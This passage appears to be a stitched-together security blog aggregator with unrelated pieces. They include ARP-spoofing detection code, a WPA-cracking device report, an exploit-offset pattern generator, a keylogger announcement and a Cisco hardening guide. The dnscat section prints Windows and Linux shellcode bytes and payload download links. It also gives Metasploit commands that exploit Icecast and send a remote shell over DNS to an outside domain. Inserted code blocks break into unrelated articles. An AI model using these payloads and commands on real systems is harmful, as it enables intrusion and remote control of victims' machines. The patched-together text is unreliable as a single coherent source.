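            conflicts.append((ip, claims[ip], mac))
        claims.setdefault(ip, mac)   # the first claim seen stays the reference
    return conflicts


# Constructed sample addresses (not from the page); 00:0C:29 and 00:50:56 are VMware OUIs.
GATEWAY_IP = bytes([192, 168, 2, 1])
HOST_IP = bytes([192, 168, 2, 100])
GATEWAY_MAC = bytes.fromhex("000c29aabbcc")
HOST_MAC = bytes.fromhex("001c14112233")
ROGUE_MAC = bytes.fromhex("005056ddeeff")

SAMPLE_FRAMES = [
    build_arp_frame(1, HOST_MAC, HOST_IP, b"\x00" * 6, GATEWAY_IP),    # host asks who has the gateway
    build_arp_frame(2, GATEWAY_MAC, GATEWAY_IP, HOST_MAC, HOST_IP),    # legitimate reply
    build_arp_frame(2, ROGUE_MAC, GATEWAY_IP, HOST_MAC, HOST_IP),      # same IP, different MAC
]

if __name__ == "__main__":
    for frame in SAMPLE_FRAMES:
        a = parse_arp_frame(frame)
        print(f"{a['opcode_name']:8} {a['sender_ip']} is-at {a['sender_mac']} ({a['sender_vendor']})")
    for ip, first, second in find_ip_mac_conflicts(SAMPLE_FRAMES):
        print(f"CONFLICT: {ip} claimed by {first} and later by {second}")
```

Feeding real traffic into `find_ip_mac_conflicts` is a matter of handing it the packet bytes that a capture library delivers; the caplen check at the top of `parse_arp_frame` is the same guard the C callback needs, since libpcap will happily deliver a frame shorter than 42 bytes.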
-
Secpoint has introduced a new "portable penetrator" that offers browser-based wireless vulnerability scanning of large networks across hundreds of IP addresses simultaneously. The out-of-the-box unit is based on a Dell Inspiron Mini 10v netbook with a 10.1" screen, six-hour battery life, 1.6 Ghz Dual core Atom processor and a Linux OS. The Portable Penetrator PP3000 also features a USB wireless adapter antenna that boasts a strength of 8dBi and is capable of cracking security keys encrypted with WEP, WPA or WPA2.

"We continue to see, week-after-week, how corporate computers connected to external networks fall foul of various security breaches after their Wi-Fi keys are cracked. Our latest Portable Penetrator identifies all of these danger zones and provides essential advice how to fix the holes," explained Secpoint CEO Victor Christiansenn. "[For example], a Wi-Fi router should, at a bare minimum, be protected by WEP 2.0 with a 25-character password and internal passwords at least 10 characters long, with at least one special character, four numerals, and at least one capital letter; but we never cease to be amazed by the sort of sensitive documents and databases we can access once our Portable Penetrator gets to work on the corporate client networks we're testing."

On start-up, the Penetrator provides the names of all identified networks in range, their types of encryption, signal strengths and number of connected users. Users can then launch any number of a wide variety of attacks, including denial of service, against any of detected networks. The Penetrator's attack dictionary currently includes more than 50 languages and runs 250 keys per second across a WPA encrypted network until the network password is identified. Finally, the unit is programmed to identify more than 42,000 remote unique security vulnerabilities and display the tested networks on Google Maps in real-time.

video / source: Secpoint cracks WPA keys with Portable Penetrator | TG Daily
-
While developing exploits, at times you require a unique string in which any 4 consecutive characters selected at any point are unique across the string (or may be repeated only after a large gap of characters). This is mostly used to find the 'offset' of the characters which have overwritten the EIP register. Metasploit (version 3.0+) has a tool for both: 1) to generate the string pattern (tools/pattern_create.rb), 2) to find the offset of the required pattern (tools/pattern_offset.rb). These are amazing utilities and really helpful for exploit development. However, the scripts are based on Ruby (in the Metasploit Framework) and it may not be possible for someone to carry the entire MSF. Now people have come up with many alternate solutions and have made their own ports to different scripting languages based on these 2 utilities. I have been getting my hands dirty with Perl for some time now, and this served as a good project for me to learn Perl. So I have also developed a Perl script which combines these two functionalities (i.e. pattern generation and offset search) into one script. The code is available at the end of this post. It's not a complete port, but it should be able to do the job most of the time. There are two modes of operation: 1) Only one argument is provided, which is the length of the string to be generated (./gspattern.pl [length of string]); 2) Both the length of the string and the pattern whose offset is to be found are provided (./gspattern.pl [length of string] [pattern to search]). The script can handle multiple occurrences of the pattern (this would happen in cases where the string length is very large). (Let me know if you find any bugs in the code. I am no expert programmer. Just getting my hands dirty in Perl. The script can currently generate strings of length up to 20306 characters.)
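As an added example, separate from the post's own Perl script, here are the same two operations in Python, extended to the full Metasploit-style cycle and to the step the post describes of turning a crash-time EIP value into the four pattern characters to search for; the EIP value 0x37634136 in the main block is constructed for illustration.

```python
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"
# one full cycle of Aa0 Aa1 ... Zz9 is 26 * 26 * 10 triples of 3 characters
CYCLE_LEN = len(UPPER) * len(LOWER) * len(DIGITS) * 3   # 20280


def pattern_create(length: int) -> str:
    """Return the cyclic pattern Aa0Aa1Aa2...Zz9 cut to `length` characters.

    Within one cycle (20280 characters) every 4-character window is unique,
    which is what makes the offset search unambiguous. Longer requests wrap
    around, so a needle can then match more than once (see pattern_offsets).
    """
    if length < 1:
        raise ValueError("length must be a positive integer")
    cycle = "".join(u + l + d for u in UPPER for l in LOWER for d in DIGITS)
    repeats = length // CYCLE_LEN + 1
    return (cycle * repeats)[:length]


def pattern_offsets(pattern: str, needle: str) -> list[int]:
    """Every offset at which `needle` occurs in `pattern`, like pattern_offset.rb."""
    hits, pos = [], pattern.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = pattern.find(needle, pos + 1)
    return hits


def eip_is_pattern(eip: int) -> bool:
    """True when all four bytes of `eip` are letters or digits, i.e. could have
    come from the pattern; a value like 0x7c801234 was not overwritten by it."""
    return 0 <= eip <= 0xFFFFFFFF and struct.pack("<I", eip).isalnum()


def eip_to_needle(eip: int) -> str:
    """Turn a crash-time EIP value read from a debugger into the 4 pattern
    characters that overwrote it. x86 is little-endian, so 0x37634136 was
    written as the bytes 36 41 63 37, i.e. the text "6Ac7"."""
    if not eip_is_pattern(eip):
        raise ValueError(f"EIP {eip:#010x} does not consist of pattern characters")
    return struct.pack("<I", eip).decode("ascii")


def find_eip_offset(buffer_len: int, eip: int) -> list[int]:
    """Offsets inside a `buffer_len`-character pattern whose bytes landed in EIP."""
    return pattern_offsets(pattern_create(buffer_len), eip_to_needle(eip))


if __name__ == "__main__":
    print(pattern_create(40))
    # constructed crash value for a 5000-byte pattern: EIP was overwritten at offset 80
    print(find_eip_offset(5000, 0x37634136))
```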
#!/usr/bin/perl -w
use strict;

# Generate/Search Pattern (gspattern.pl) v0.1
# Scripted by Wasim Halani (washal)
# Visit me at http://securitythoughts.wordpress.com/
# Thanks to hdm and the Metasploit team
# Special thanks to Peter Van Eeckhoutte (corelanc0d3r) for his amazing Exploit Development tutorials
# This script is to be used for educational purposes only.

my $ustart = 65;    # ASCII 'A'
my $uend   = 90;    # ASCII 'Z'
my $lstart = 97;    # ASCII 'a'
my $lend   = 122;   # ASCII 'z'
my $nstart = 0;
my $nend   = 9;
my $length;
my $string = "";
my ($upper, $lower, $num);
my $searchflag = 0;
my $searchstring;
my $skip = 'FALSE';

sub credits {
    print "\nGenerate/Search Pattern \n";
    print "Scripted by Wasim Halani (washal)\n";
    print "http://securitythoughts.wordpress.com/\n";
    print "Version 0.1\n\n";
}

sub usage {
    credits();
    print " Usage: \n";
    print " gspattern.pl <length of buffer> \n";
    print " Will generate a string of given length. \n";
    print "\n";
    print " gspattern.pl <length of buffer> <search pattern> \n";
    print " Will generate a string of given length,\n";
    print " and display the offsets of pattern found.\n";
}

# report every offset of the search pattern inside the generated string
sub search {
    my $offset = index($string, $searchstring);
    if ($offset == -1) {
        print "Pattern not found\n";
        exit(1);
    }
    print "Pattern found at offset(s) : ";
    # resume the search just past each hit so repeated occurrences are all listed
    while ($offset != -1) {
        print $offset . " ";
        $offset = index($string, $searchstring, $offset + 1);
    }
    print "\n";
    exit(1);
}

sub finish {
    print "String is : \n" . $string . "\n";
    if ($searchflag) {
        search();
    }
    exit(1);
}

sub generate {
    credits();
    $length = $ARGV[0];
    #print "Generating string for length : " . $length . "\n";
    if (length($string) == $length) { finish(); }
    # looping for the uppercase
    for ($upper = $ustart; $upper <= $uend; $upper++) {
        $string = $string . chr($upper);
        if (length($string) == $length) { finish(); }
        $skip = 'FALSE';
        # looping for the lowercase
        for ($lower = $lstart; $lower <= $lend; $lower++) {
            # note: the string 'FALSE' is a true value in Perl, so this branch never
            # runs; the pattern therefore starts "A0Aa1Aa2..." and each uppercase
            # block is 1 + 26 * 10 * 3 = 781 characters, 20306 in total
            if (!$skip) {
                $string = $string . chr($lower);
            }
            if (length($string) == $length) { finish(); }
            # looping for the numeral
            for ($num = $nstart; $num <= $nend; $num++) {
                $string = $string . $num;
                if (length($string) == $length) { finish(); }
                $string = $string . chr($upper);
                if (length($string) == $length) { finish(); }
                $string = $string . chr($lower);
                if (length($string) == $length) { finish(); }
                $skip = 'TRUE';
            }
        }
    }
    # only reached when the requested length is larger than the loops can produce
    print "Requested length exceeds the maximum of " . length($string) . " characters\n";
    exit(1);
}

if (!$ARGV[0]) {
    usage();
    #print "Going into usage..";
}
elsif ($ARGV[1]) {
    $searchflag = 1;
    $searchstring = $ARGV[1];
    generate();
    #print "Going into pattern search...";
}
else {
    generate();
    #print "Going into string generation...";
}

[Tool] Unique Pattern Generator for Exploit Development - Security Thoughts
-
After years of building firewalls and other defenses against relentless hacker attacks, the Pentagon is going over to the dark side of computer warfare. But ethically, of course. The Defense Department, like most other large organizations, has recognized that no wall is high enough to keep out skilled and determined hackers for keeps. Instead, it has decided that in order to anticipate and thwart attacks, it needs to know what the hackers know. "More than 100 foreign intelligence organizations are trying to hack into U.S. systems," Deputy Defense Secretary William Lynn warned last month. "Some governments already have the capacity to disrupt elements of the U.S. information infrastructure." So the Pentagon recently modified its regulations to allow military computer experts to be trained in computer hacking, gaining the designation "certified ethical hackers." They'll join more than 20,000 other such good-guy hackers around the world who have earned that recognition since 2003 from the private International Council of E-Commerce Consultants (also known as the EC-Council). "We are creating cyber-bodyguards," says Sanjay Bavisi, president of the council. "We're not creating combat people." But as the world becomes increasingly interconnected via the Internet, the stakes have become too high to rely on static defenses alone to protect the immense flows of vital information that operate the world's financial, medical, governmental and infrastructure systems. "The bad guys already have the hacking technologies," Bavisi says. "We can say, 'Tough luck. The bad guys play by different rules, and you can't do anything about it, so just go lock your doors.' Or we can tell the good guys, 'We will arm you with the same knowledge as the bad guys, because to defeat the hacker you need to be able to think like one.'" Bavisi and the Pentagon are sensitive to the possibility that the tactics taught could be used for other purposes. 
"We're not training Department of Defense guys to become hackers and start hacking into China or any other countries," he says. Weeklong courses will train them in 150 hacking techniques and technologies, ranging from viruses, worms, sniffers and phishing to cyberwarfare. The cost of the course ranges from $450 to $2,500, depending on the training involved. Pentagon personnel "are not learning to hack," insists Air Force Lieut. Colonel Eric Butterbaugh. While the EC-Council calls it "certified ethical hacker" training, the U.S. military also calls it "penetration testing" or "red-teaming." These are proven military techniques that have been used for decades to hone war-fighting skills. The Air Force and Navy, for example, maintain "aggressor squadrons" of F-5 and MiG warplanes to give U.S. military pilots practice against the tactics of potential foes. And the Army's National Training Center at Fort Irwin, Calif., has long boasted a highly trained "op-for" — opposition force — that regular U.S. Army units engage in realistic war games. The program will be no cure-all for the Pentagon, whose networks are hacked hundreds of times a day. Adriel Desautels, the chief technology officer at Netragard LLC, a Massachusetts-based antihacking outfit, says that while "it's better than nothing," there are simply too many vulnerabilities to protect the Pentagon's estimated 10 million computers. Desautels likens it to 1,000 Dutch boys trying to stop water from flowing through a dike springing millions of leaks. "The threat is defined by the real black hats, and it's impossible to know what the black hats are researching," he says. "The number of vulnerabilities far exceeds what any white hats are going to discover." Both Butterbaugh and Bavisi say there are no concerns that military personnel trained as hackers might go rogue. "Computer-network-defense service providers," Butterbaugh says, "are vetted and have security clearances." 
Not only that, notes Bavisi, but those trained as ethical hackers have to sign a legally binding pledge that they will not engage in malicious hacking. "So far," he says, "we haven't had a single case where someone became a real hacker." Read more: Pentagon Trains Computer Hackers for Cyber-Defense - TIME
-
This is the video of the presentation titled "Internet Explorer turns your personal computer into a public file server" given by Jorge Luis Alvarez Medina at Blackhat 2010. In this presentation we will show how an attacker can read every file of your file system if you are using Internet Explorer. This attack leverages different design features of Internet Explorer entailing security risks that, while low if considered isolated, lead to interesting attack vectors when combined altogether. We will also disclose and demonstrate proof of concept code developed for the scenarios proposed. Internet Explorer turns your personal computer into a public file server (Blackhat 2010) Tutorial
-
l33t, want a smack on the backside?
-
Security company 3Com TippingPoint has jacked up to $100,000 (£65,000) the prize money on offer to anyone able to hack a range of browsers and mobile devices at the forthcoming CanSecWest security conference. Running for the fourth year at the event, $40,000 of the Pwn2Own contest pot will be on offer to entrants that successfully exploit security vulnerabilities to compromise the top four browsers, Internet Explorer, Mozilla Firefox, Google Chrome, and Safari, equivalent to $10,000 per browser. To win the money outright, the attacks on IE, Firefox and Chrome must work while running on a fully-patched Windows 7, while Safari will be attacked running on OS X Snow Leopard. Brownie points will be gained if the same flaw works on Vista and XP, although the assumption would be that this would be highly likely anyway. To make the contest tougher, attackers can't use third-party plug-ins such as Adobe Flash on day one of the event. These are often a soft underbelly, so excluding them raises the bar. Part two of the contest, accounting for the remaining $60,000, will ask contestants to successfully hack the Apple iPhone, Blackberry Bold 9700, the Nokia/Symbian S60, and an unspecified Motorola device running Android, with each worth $15,000. In both sections of the contest - browser and mobile device - bonus benefits will also be offered for exploits that show an unusual level of difficulty, and winners will get to keep the device on which the hack was carried out. Despite the eye-catching cash on offer, the contest is really a clever way of marketing TippingPoint's controversial Zero-Day Initiative (ZDI) scheme, under which researchers are paid to find exploits which are then added to the intrusion detection engines from which the company makes much of its living.
At the time of its launch in 2005, the ZDI was criticised by rival vendors and some independent voices as tantamount to encouraging people to sell exploits uncovered to the highest bidder, in this case, 3Com's TippingPoint division. TippingPoint points out that all exploits discovered through the Pwn2Own contest will be disclosed to the vendors concerned as well as being added to its own database. Pwn2Own co-ordinator at TippingPoint, Aaron Portnoy, predicted that mobile devices would be particularly vulnerable while the easiest browser to crack would be IE on Windows 7. The browser that would resist attacks the most robustly would be Chrome thanks to its sandbox security feature which restricts what can happen inside a browser. "The discoveries and threats that come out of this will unequivocally show just how much 'at risk' many businesses are," said Portnoy in his contest notes. More information on Pwn2Own can be found on TippingPoint's website. The contest will run at the CanSecWest security conference held in Vancouver on 24 March. Hackers offered $100,000 for browser and phone exploits - Techworld.com
-
Hey all, I've been letting other projects slip these last couple weeks because I was excited about converting dnscat into shellcode (or "weaponizing dnscat", as I enjoy saying). Even though I got into the security field with reverse engineering and writing hacks for games, I have never written more than a couple lines of x86 at a time, nor have I ever written shellcode, so this was an awesome learning experience. Most people start by writing shellcode that spawns a local shell; I decided to start with shellcode that implements a dnscat client in under 1024 bytes (for both Linux and Windows). Like I always say, go big or go home!

If you just want to grab the files, here are some links:

http://www.skullsecurity.org/blogdata/dnscat-shell-win32.asm
http://www.skullsecurity.org/blogdata/dnscat-shell-win32
http://www.skullsecurity.org/blogdata/dnscat-shell-win32.h
http://www.skullsecurity.org/blogdata/dnscat-shell-win32.rb
http://www.skullsecurity.org/blogdata/dnscat-shell-linux.asm
http://www.skullsecurity.org/blogdata/dnscat-shell-linux.h

If you want to get your hands dirty, you can compile the source -- right now, it's only in svn:

svn co http://svn.skullsecurity.org:81/ron/security/nbtool
cd nbtool
make

That'll compile both the standard dnscat client/server and, if you have nasm installed, the Linux and Windows shellcodes. On Windows, you'll need nasm to assemble it. I installed Cygwin, but you can compile the Windows shellcode on Linux or vice versa if you prefer. The output will be in samples/shellcode-*/. A .h file containing the C version will be generated, as well:

$ head -n3 dnscat-shell-test.h
char shellcode[] =
"\xe9\xa2\x01\x00\x00\x5d\x81\xec\x00\x04\x00\x00\xe8\x4e\x03\x00"
"\x00\x31\xdb\x80\xc3\x09\x89\xef\xe8\x2e\x03\x00\x00\x80\xc3\x06"
...

And, of course, the raw file is output (without an extension), that can be run through msfencode or embedded into a script:

$ make
[...]
$ wc -c samples/shellcode-win32/dnscat-shell-win32
997 samples/shellcode-win32/dnscat-shell-win32
$ wc -c samples/shellcode-linux/dnscat-shell-linux
988 samples/shellcode-linux/dnscat-shell-linux

Unless you want to be sending your cmd.exe (or sh) shell to skullseclabs.org, you'll have to modify the domain as well -- the very last line in the assembly code for both Windows and Linux is this:

get_domain:
    call get_domain_top
    db 1, 'a'             ; random
    db 12,'skullseclabs'  ; <-- To modify domain, change this...
    db 3,'org'            ; <-- and this. The number is the section length.
    db 0

The two lines with the domain have to be changed. The number preceding the name is, as the comment says, the length of the section ('skullseclabs' is 12 bytes, and 'org' is 3 bytes). This process is automated with the Metasploit payload, as you'll see.

Encoding with msfencode

msfencode from the Metasploit project is a beautiful utility. I highly recommend running shellcode through it before using it. The most useful aspect with shellcode is, at least to me, the ability to eliminate characters. So, if I need to get rid of \x00 (null) characters from my strings, it's as easy as:

$ msfencode -b "\x00" < dnscat-shell-win32 > dnscat-shell-win32-encoded
[*] x86/shikata_ga_nai succeeded with size 1024 (iteration=1)

If you're planning on using this in, for example, Metasploit, you don't have to worry about the msfencode step -- it'll do that for you.

Metasploit payload

Speaking of metasploit, yes! I wrote a metasploit payload for dnscat. First, there are a number of caveats:

* This is highly experimental
* This doesn't have a proper "exitfunc" call -- it just returns and probably crashes the process
* This is set up as a single stage, right now, and is 1000 or so bytes -- as a result, it won't work against most vulnerabilities
* The dnscat server isn't part of Metasploit, yet, so you'll have to compile and run it separately

That being said, it also works great when it's usable. The target I use for testing is Icecast 2 version 2.0.0 (WARNING: don't install vulnerable software on anything important!), which is included on the SANS 560 and 504 CDs (thanks Ed!). It's free, GPL, reliable, and has 2000 bytes in which to stuff the payload. So, the steps you need to take are:

1. Install Icecast2 on your victim machine (Win32)
2. Download the experimental dnscat Metasploit module and put it in your Metasploit directory (modules/payloads/singles/windows/)
3. Fire up a dnscat server on your authoritative DNS server (dnscat --listen) -- see the dnscat wiki for more information
4. Run Metasploit (msfconsole) and enter the following commands:

msf > use exploit/windows/http/icecast_header
msf exploit(icecast_header) > set PAYLOAD windows/dnscat-shell-win32
PAYLOAD => windows/dnscat-shell-win32
msf exploit(icecast_header) > set RHOST 192.168.1.221
RHOST => 192.168.1.221
msf exploit(icecast_header) > set DOMAIN skullseclabs.org
DOMAIN => skullseclabs.org
msf exploit(icecast_header) > exploit
[*] Exploit completed, but no session was created.

Meanwhile, on your dnscat server, if all went well, you should see:

$ sudo ./dnscat --listen
Waiting for DNS requests for domain '*' on 0.0.0.0:53...
Switching stream -> datagram
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Program Files\Icecast2 Win32>

You can type commands in, and they'll run just like a normal shell. Be warned, though, that it is somewhat slow, due to the nature of going through DNS.

Why bother?

The big advantage to this over traditional shellcode is that no port, whether inbound or outbound, is required! As long as the server has a DNS server set that will perform recursive lookups, it'll work great!

Feedback

As I said, this is the first time I've ever written shellcode or x86. I'm sure there are lots of places where it could be significantly improved, and I'd love to hear feedback from the folks who really know what they're doing and can help me improve my code. Thanks!

SkullSecurity Blog Archive - Weaponizing dnscat with shellcode and Metasploit
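The length-prefixed layout of the get_domain block, as an added example in Python (not code from the post or from nbtool): it encodes and decodes a domain as DNS wire-format labels and emits the matching db lines, rejecting labels the format cannot carry; example.org in the main block is a placeholder domain.

```python
import re

# RFC 1035 hostname label: 1..63 letters, digits or hyphens, no leading/trailing hyphen
LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def split_labels(name: str) -> list[str]:
    """Split 'skullseclabs.org' (with or without a trailing dot) into its labels."""
    return name.rstrip(".").split(".")


def is_valid_dns_name(name: str) -> bool:
    """True when every label is a valid hostname label and the wire-format name
    (each label plus its length byte, plus the terminating zero) fits in 255 bytes."""
    labels = split_labels(name)
    if not all(LABEL_RE.match(label) for label in labels):
        return False
    return sum(len(label) + 1 for label in labels) + 1 <= 255


def encode_dns_name(name: str) -> bytes:
    """Wire-format a name as length-prefixed labels ending in a zero byte: the
    layout the shellcode hard-codes as db 12,'skullseclabs' / db 3,'org' / db 0."""
    if not is_valid_dns_name(name):
        raise ValueError(f"invalid DNS name: {name!r}")
    out = bytearray()
    for label in split_labels(name):
        out.append(len(label))          # one length byte ...
        out += label.encode("ascii")    # ... followed by the label text
    out.append(0)                       # the empty root label terminates the name
    return bytes(out)


def nasm_db_lines(name: str) -> list[str]:
    """Emit db directives in the same shape as the get_domain block, so a
    replacement domain always carries the correct section lengths."""
    if not is_valid_dns_name(name):
        raise ValueError(f"invalid DNS name: {name!r}")
    lines = [f"db {len(label)},'{label}'" for label in split_labels(name)]
    lines.append("db 0")
    return lines


def decode_dns_name(buf: bytes, offset: int = 0) -> tuple[str, int]:
    """Parse a wire-format name starting at `offset`; return (name, next_offset).
    Compression pointers (top two bits of a length byte set) are rejected, since
    a hard-coded query name such as the shellcode's never uses them."""
    labels = []
    while True:
        if offset >= len(buf):
            raise ValueError("name is truncated")
        n = buf[offset]
        offset += 1
        if n == 0:
            break
        if n & 0xC0:
            raise ValueError("compression pointer not supported here")
        if offset + n > len(buf):
            raise ValueError("label runs past the end of the buffer")
        labels.append(buf[offset:offset + n].decode("ascii"))
        offset += n
    return ".".join(labels), offset


if __name__ == "__main__":
    # the shellcode's query name is the one-byte 'a' label followed by the domain
    print(encode_dns_name("a.skullseclabs.org").hex())
    print("\n".join(nasm_db_lines("example.org")))   # placeholder domain
```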
-
More than 100 drivers in Austin, Texas found their cars disabled or the horns honking out of control, after an intruder ran amok in a web-based vehicle-immobilization system normally used to get the attention of consumers delinquent in their auto payments. Police with Austin’s High Tech Crime Unit on Wednesday arrested 20-year-old Omar Ramos-Lopez, a former Texas Auto Center employee who was laid off last month, and allegedly sought revenge by bricking the cars sold from the dealership’s four Austin-area lots. “We initially dismissed it as mechanical failure,” says Texas Auto Center manager Martin Garcia. “We started having a rash of up to a hundred customers at one time complaining. Some customers complained of the horns going off in the middle of the night. The only option they had was to remove the battery.” The dealership used a system called Webtech Plus as an alternative to repossessing vehicles that haven’t been paid for. Operated by Cleveland-based Pay Technologies, the system lets car dealers install a small black box under vehicle dashboards that responds to commands issued through a central website, and relayed over a wireless pager network. The dealer can disable a car’s ignition system, or trigger the horn to begin honking, as a reminder that a payment is due. The system will not stop a running vehicle. Texas Auto Center began fielding complaints from baffled customers the last week in February, many of whom wound up missing work, calling tow trucks or disconnecting their batteries to stop the honking. The troubles stopped five days later, when Texas Auto Center reset the Webtech Plus passwords for all its employee accounts, says Garcia. Then police obtained access logs from Pay Technologies, and traced the saboteur’s IP address to Ramos-Lopez’s AT&T internet service, according to a police affidavit filed in the case. 
Ramos-Lopez’s account had been closed when he was terminated from Texas Auto Center in a workforce reduction last month, but he allegedly got in through another employee’s account, Garcia says. At first, the intruder targeted vehicles by searching on the names of specific customers. Then he discovered he could pull up a database of all 1,100 Auto Center customers whose cars were equipped with the device. He started going down the list in alphabetical order, vandalizing the records, disabling the cars and setting off the horns. “Omar was pretty good with computers,” says Garcia. The incident is the first time an intruder has abused the no-start system, according to Jim Krueger, co-owner of Pay Technologies. “It was a fairly straightforward situation,” says Krueger. “He had retained a password, and what happened was he went in and created a little bit of havoc.” Krueger disputes that the horns were honking in the middle of the night; he says the horn honking can only be activated between 9 a.m. and 9 p.m. First rolled out about 10 years ago, remote immobilization systems are a controversial answer to delinquent car payments, with critics voicing concerns that debtors could suffer needless humiliation, or find themselves stranded during an emergency. Proponents say the systems let financers extend credit to consumers who might otherwise be ineligible for an auto loan. Austin police filed computer intrusion charges against Ramos-Lopez on Tuesday. Read More Hacker Disables More Than 100 Cars Remotely | Threat Level | Wired.com
-
Javascript Keylogger has been updated. The new release contains a customized HTTP server that generates keystroke reports. From the readme: Start the server, view Test1.htm or Test2.htm, and type in one of the inputs to see it in action. Logged keystrokes are displayed in the console and written to a text file in the same directory as the server. Server settings are in the JavascriptKeyloggerServer.exe.config file. Download 1 Download 2
-
Where do you people keep coming from? Since I woke up I've already handed out 5 bans.
-
It would have been something if you had posted the password too.
-
Breaching the network perimeter is much more difficult today than a few years ago. Most large enterprises have dedicated security teams running IDSs/IPSs, and have network separation, event monitoring and alerting capabilities. This has caused a paradigm shift in the way hacking, and hence penetration testing, needs to be conducted. Hackers now look more at the users of the protected network as the attack vector than at the network perimeter itself. User environments are far more complex than a network perimeter. Hackers use browser vulnerabilities, and security flaws in plugins such as Flash, ActiveX, Quicktime etc., to compromise users remotely. As most of these users have unrestricted access to internal networks and resources in an organization, a hacker can thus penetrate deep into the network without ever having to break through the perimeter. In this detailed video lecture, spanning over 2 hours, Dean De Beer talks about client-side penetration testing methodologies and how they differ from the server- and perimeter-focused ones. You can download the PDF of the talk here. Thanks to Dan Guido for posting this wonderful lecture on his site. I highly recommend SecurityTubers to watch this video! Client Side Penetration Testing Methodology Primer Tutorial
-
In the journal Nature Nanotechnology this week, the researchers describe a process that could become an alternative to conventional photolithography, which relies on light projected onto a photo-sensitive material, as people continue to forecast the demise of Moore's Law. That observation states that the number of transistors that can be placed on an integrated circuit doubles roughly every two years. Led by Caroline Ross and Karl Berggren, both engineering professors, the scientists used electron beam lithography to create nanoscale "posts" on a silicon chip. They then deposited copolymers--large molecules of two polymers with repeating structural units--on the chip. The copolymers spontaneously linked to the posts and arranged themselves into useful patterns. The polymers naturally want to separate from each other, thus causing them to arrange in predictable ways. (Berggren compares different polymer molecules to the characters played by Robert De Niro and Charles Grodin in "Midnight Run"--a bounty hunter and a white-collar criminal who are handcuffed together but can't stand each other.) A variety of patterns that can be used in circuit design could be achieved by changing the shape and position of the posts, the proportions of the polymers, and the length of the molecule chains, MIT said. When exposed to plasma, one polymer burns away, while the other turns to glass. The latter could work like a photoresist in optical lithography (a photoresist is a light-sensitive material onto which light is projected to form a pattern for the chip). The team is still working to produce functioning circuits in a prototype chip, and to create even smaller chip features with the copolymer technique. news.cnet.com
-
Social-networking sites have grown tremendously in popularity in recent years. Services such as Facebook and MySpace allow millions of users to create online profiles and to share details of their personal lives with vast networks of friends, and often, strangers. Inevitably, the disclosure of personal information has implications for users' privacy: digital stalking and identity theft are some of the most common threats. Unfortunately, even sophisticated users who value privacy will often compromise it to improve their presence in the virtual world. They know that loss of control over their personal information poses a long-term threat, but they cannot assess the overall and long-term risk accurately enough to compare it to the short-term gain. Even worse, setting the privacy preferences in online services is often a complicated and time-consuming task that users usually skip. To address these issues, we are developing mechanisms and platforms to measure and monitor users' privacy risks and help them easily manage their information sharing. In this talk, we will introduce our work in this area, and also discuss how it can be incorporated with OpenSocial. Speaker Bio: Kun Liu, Ph.D., is a postdoctoral researcher at IBM Almaden Research Center. He received his Ph.D. from the University of Maryland Baltimore County in 2007. His research interests include data mining, social-network analysis and text analytics. His featured work is in the area of privacy-preserving data mining, where he developed advanced privacy and risk management techniques that greatly facilitate the integration, sharing and analysis of data owned by different parties without compromising their privacy. More information about him can be found at Kun Liu at University of Maryland Baltimore County (UMBC). Towards Privacy Aware OpenSocial Applications (IBM Research) Tutorial
-
A more accurate title for this article would have been how to increase security on a Cisco border router, but that's too long. This article assumes some familiarity with Cisco routers. If you're not familiar with Cisco IOS command line interaction, consult reference [2] below, or Cisco documentation. Thoroughly securing a Cisco router (or any router) is a topic that can require its own book(s) (see the references at the end of this article). I will cover the basics here though: the low-hanging fruit. Before you begin, keep a copy of your present, working router configuration in pristine condition. Save the edited configuration to a new file. The same goes for IOS code. Make sure you have a full copy of the version you're running before you upgrade.

1. Upgrade IOS. Upgrade to the latest stable code version available for your router. Like other operating systems, Cisco IOS is upgraded for various reasons, including to fix security flaws. How to do that is beyond the scope of this article, but you can find more info here: Software Upgrade Procedure - Cisco Systems

2. Generate an RSA crypto-key. If your router code supports cryptography, enter the following commands to create a crypto-key for later use with SSH (if your router does not support cryptography, you will receive an error when you try to enter the commands):

hostname [enter a hostname for your router]
ip domain-name [enter your domain name, i.e. mydomain.com]
crypto key generate rsa

If it works, the router will process the command for a moment, then ask you how many bits the modulus should be. If permitted by your local laws regarding cryptography, enter 1024. If not, enter the largest number you are entitled to use.

3. Disable unneeded services. There are many services that are enabled by default on Cisco routers. Each can provide information an attacker can use. There is a free utility called Yersinia that can be used to obtain Cisco Discovery Protocol (CDP) information over the Internet, for example.
Global commands:

no service tcp-small-servers
no service udp-small-servers
no service dhcp
no ip bootp server
no service finger
no ip http server [you may not want to enter this command if you use Adaptive Security Device Manager (ASDM) to manage your router over HTTP]
no ip http secure-server [you may not want to enter this command if you use ASDM to manage your router over HTTPS]
no snmp-server
no cdp run
no service config
no ip gratuitous-arps
no ip source-route
ip options drop

Interface commands (enter these on each interface in use):

no ip directed-broadcast
no ip unreachables
no ip redirects
no ip mask-reply
no ip proxy-arp

In addition to the above, the shutdown command should be applied to interfaces that are not in use.

4. Enable 'good' services.

Some beneficial services are not enabled by default. We'll turn them on:

service tcp-keepalives-in
service tcp-keepalives-out
service timestamps debug datetime msec show-timezone localtime
service timestamps log datetime msec show-timezone localtime

5. Secure local and remote access.

Console line configuration:

line con 0
 exec-timeout 5 0
 login

Auxiliary line configuration (should be disabled unless needed for remote access):

line aux 0
 no exec
 exec-timeout 0 10
 transport input none

VTY lines (virtual lines for remote access over the network):

line vty 0 4
 exec-timeout 5 0
 login
 transport input telnet ssh

(If you can configure SSH for remote access, it is recommended that you remove the word telnet from the above command and only use SSH for remote access.)

6. Set and secure passwords.

service password-encryption
enable secret 0 [enter your password here]

Console line:

line con 0
 password [enter your password here]

Auxiliary line:

line aux 0
 password [enter your password here]

7. Enable and configure logging.

Ideally, logs should be sent to a hardened syslog server so they cannot be tampered with and so they are more permanent. Local logs are deleted whenever the router is rebooted. We will configure local logging here though.

logging enable
logging buffered 16000
logging console critical
logging trap informational

8. Other measures.

Additional measures you can take include:

8.a. Drop bogon and Martian traffic.

